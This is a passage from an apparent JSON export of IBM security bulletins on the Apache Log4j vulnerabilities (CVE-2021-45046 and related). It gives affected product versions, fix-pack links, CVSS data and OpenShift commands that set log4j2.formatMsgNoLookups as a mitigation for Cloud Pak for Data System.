vulnerability now by applying below patch. The remediation is applicable to ICPDS v1.0.7.6 - 1.0.7.7 releases. **\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 1.0 - Openshift Container Platform 3.11\n\n| `1.0.0.0-openshift-3.11.log4j-WS-ICPDS-fp136`| [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=1.0.0.0-openshift-3.11.log4j-WS-ICPDS-fp136&source=SAR&function=fixId&parent=ibm/WebSphere>) \n \n * Please follow the steps given in **[release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/1.0?topic=new-log4j-vulnerability-patch> \"release notes\" )** to apply above remediation. Please replace fpxxx in the release note with fp136.\n\n## Workarounds and Mitigations\n\n**Customers on ICPDS v1.0.0.0- 1.0.7.5 should apply the mitigation below**\n\n**Mitigation For OpenShift Container Platform 3.11 \n**\n\n**Note**: Below mitigation is needed and applicable if openshift-logging is enabled on system.\n\nTo determine if openshift-logging enabled, follow these steps:\n\n1) Login to control vm e1n1-1-control : ssh e1n1-1-control\n\n2) Run below command:\n \n \n oc get dc -n openshift-logging\n\n**Example**:\n\nWhen openshift-logging is enabled:\n \n \n $ oc get dc -n openshift-logging\n NAME REVISION DESIRED CURRENT TRIGGERED BY\n logging-es-data-master-76ovaz98 2 1 1\n logging-kibana 1 1 1 config \n \n \n\nWhen openshift-logging is NOT enabled:\n \n \n $ oc get dc -n openshift-logging\n No resources found.\n \n \n \n\n**Follow the below steps to mitigate the reported CVE-2021-45046 for Openshift Container Platform 3.11 \n**\n\n1) Login to control vm e1n1-1-control : ssh e1n1-1-control\n\nRun below commands as apadmin user:\n\n2) Change to project where Logging stack deployed (by default \"openshift-logging\" project)\n \n \n $ oc project openshift-logging\n \n\n3) Find the 'elasticsearch' `deploymentConfigs` deployed for passing later to `oc set env` command\n \n \n $ oc get dc -l component=es\n \n NAME REVISION DESIRED CURRENT TRIGGERED BY\n logging-es-data-master-kfity61t 9 1 1 \n logging-es-data-master-o68rc18y 4 1 1 \n logging-es-data-master-u6hh29n4 3 1 1 \n \n\n4) Set environment variable 'ES_JAVA_OPTS' in 'elasticsearch' for system property `log4j2.formatMsgNoLookups` to true\n \n \n $ oc set env -c elasticsearch dc/<elasticsearch_deploymentConfig_name> ES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\"\n \n\nNote: \nPlease check if there are already some custom environment variables set for `ES_JAVA_OPTS` and append them if needed.\n\n5) Confirm before rolling out the variable is present:\n \n \n $ oc set env -c elasticsearch dc -l component=es --list | grep ES_JAVA_OPTS\n \n\n6) Rollout new `replicationControllers` for 'pods' to start with the new values:. Do this for all `deploymentConfigs`:\n \n \n $ oc rollout latest dc/<deploymentConfig_name>\n \n\n7) Check new ES pod has been spawned automatically after the rollout:\n \n \n $ oc get pods -l component=es\n \n NAME READY STATUS RESTARTS AGE\n elasticsearch-cdm-ba9c6evk-1-796f6cfdbc-4dqc6 2/2 Running 0 27m\n elasticsearch-cdm-ba9c6evk-2-7959d4d857-z5km9 2/2 Running 0 2d9h\n elasticsearch-cdm-ba9c6evk-3-5f9c5d668c-cr8lj 2/2 Running 0 2d9h\n \n\n8) Open a shell into the newly-spawned 'ES pods' to check Java command-line arguments passed correctly including \"-Dlog4j2.formatMsgNoLookups=true\"\n \n \n $ for es_pod in $(oc get pods -l component=es --no-headers -o jsonpath='{range .items[?(@.status.phase==\"Running\")]}{.metadata.name}{\"\\n\"}{end}'); \\\n do echo \"Confirm changes on $es_pod\" ; sleep 1 ; \\\n oc rsh -Tc elasticsearch $es_pod ps auxwww | grep log4j2.formatMsgNoLookups ; sleep 3; \\\n done\n \n\n`-Dlog4j2.formatMsgNoLookups=true` should be visible in above output\n\n9) The pods should also have this variable set:\n \n \n $ for es_pod in $(oc get pods -l component=es --no-headers -o jsonpath='{range .items[?(@.status.phase==\"Running\")]}{.metadata.name}{\"\\n\"}{end}'); \\\n do echo \"Confirm changes on $es_pod\" ; sleep 1 ; \\\n oc rsh -Tc elasticsearch $es_pod printenv | grep ES_JAVA_OPTS ; sleep 3; \\\n done\n \n\nYou should see something like:\n\nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\" \nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\" \nES_JAVA_OPTS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nRedhat CVE page for CVE-2021-45046\n\n<https://access.redhat.com/security/cve/CVE-2021-45046>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5FPD\",\"label\":\"IBM Cloud Private for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"IBM Cloud Private for Data System 1.0 - All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T06:33:28", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Data System 1.0 is vulnerable to arbitrary code execution due to Apache Log4j ( CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T06:33:28", "id": "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "href": "https://www.ibm.com/support/pages/node/6551364", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T01:50:23", "description": "## Summary\n\nApache Log4j is used by IBM Sterling Partner Engagement Manager for generating logs in all components and tools. This bulletin provides remediation for the reported vulnerability by upgrading Log4j jars to 2.16.0 in IBM Sterling Partner Engagement Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Partner Engagement Manager Standard and Essentials| 6.1.2.3.2 / 6.2.0.1.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by applying the appropriate fix image.**\n\n**Refer to the applicable links below for update and install instructions.**\n\nIBM Sterling Partner Engagement Manager Standard 6.1.2.3.3\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&amp;fixids=IBM_PEM_Standard_6.1.2.3.3&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.1.2.3.3&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Essentials 6.1.2.3.3\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&amp;fixids=IBM_PEM_Essentials_6.1.2.3.3&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.1.2.3.3&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Standard 6.2.0.1.2\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&amp;fixids=IBM_PEM_Standard_6.2.0.1.2&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Standard_6.2.0.1.2&source=SAR>)\n\nIBM Sterling Partner Engagement Manager Essentials 6.2.0.1.2\n\n * [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&amp;fixids=IBM_PEM_Essentials_6.2.0.1.2&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+Sterling+Partner+Engagement+Manager+Software&fixids=IBM_PEM_Essentials_6.2.0.1.2&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSKPRS\",\"label\":\"Partner Engagement Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.2.0.1.3, 6.1.2.3.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T06:41:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability (CVE-2021-45046) affects IBM Sterling Partner Engagement Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-22T06:41:44", "id": "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "href": "https://www.ibm.com/support/pages/node/6536624", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T13:44:21", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is used by the IBM Rational ClearQuest server and web components. Information about security vulnerabilities affecting WAS have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product** | **Version(s)** \n---|--- \nIBM Rational ClearQuest | 8.0.0 \nIBM Rational ClearQuest | 8.0.1 \nIBM Rational ClearQuest | 9.0 \nIBM Rational ClearQuest | 9.0.1 \nIBM Rational ClearQuest | 9.0.2 \nIBM Rational ClearQuest | 9.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is used by IBM Rational ClearQuest. \n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | IBM WebSphere Application Server versions 7.0, 8.0, 8.5 and 9.0. | \n\n[Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service (CVE-2021-38951)](<https://www.ibm.com/support/pages/node/6524674> \"Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service \\(CVE-2021-38951\\)\" )\n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n**ClearQuest Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | Apply the appropriate IBM WebSphere Application Server fix (see bulletin link above) directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n_For 8.0.x, 8.0.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH5A\",\"label\":\"Rational ClearQuest\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"8.0.0, 8.0.1, 9.0.0, 9.0.1, 9.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T20:51:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities have been identified in IBM WebSphere Application Server used by IBM Rational ClearQuest", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-45046"], "modified": "2021-12-21T20:51:36", "id": "08C5ED1F3E47E1FABE2752DAE40446E385D6C5EB30C70D7C739509CE04B06788", "href": "https://www.ibm.com/support/pages/node/6528968", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nIBM Cognos Controller is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Controller has upgraded Apache Log4j to v2.16. Please note that this update also addresses CVE-2021-44228.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\nPlease note clients using IBM Cognos Analytics in combination with all versions of IBM Cognos Controller should reference [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046) ](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-45046\\)\" )for important updates regarding IBM Cognos Analytics. \n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF16 from Fix Central](<https://www.ibm.com/support/pages/node/6528424> \"Download IBM Cognos Controller 10.4.2 IF16 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228.\n\nRemediation for IBM Cognos Controller on Cloud has completed. \n\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\nPlease note that this mitigation also addresses CVE-2021-45105. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: \nAdded no-upgrade option to Workarounds and MitigationsNote for clients using IBM Cognos Analytics in Affected Products and VersionsIBM Cognos Controller on Cloud remediation completion in Remediation/Fixes \n21 Dec 2021: \nFixed typo in Summary \n20 Dec 2021: \nInitial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T02:58:49", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF16: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T02:58:49", "id": "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "href": "https://www.ibm.com/support/pages/node/6528580", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nApache Log4j is used by IBM i2 Analyze for general purpose and application error logging. It is also used in IBM i2 Analyst's Notebook Premium when the chart store is deployed. This bulletin addresses the vulnerabilities for the reported CVE-2021-45105 and CVE-2021-45046. The below fix package includes Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.5.0| bundled with Enterprise Insight Analysis (EIA) 2.4.1.0 \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0 \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0 \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0 \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0 \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0 \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0 \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0 \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0 \n \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading using the links shown below.** \n \n**\n\n**NOTE: THESE FIXPACKS SUPERSEDE THE PREVIOUS FIXPACKS MENTIONED IN <https://www.ibm.com/support/pages/node/6526220>**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA (What doe EIA stand for? Please spell out at least once.)2.4.1.0| 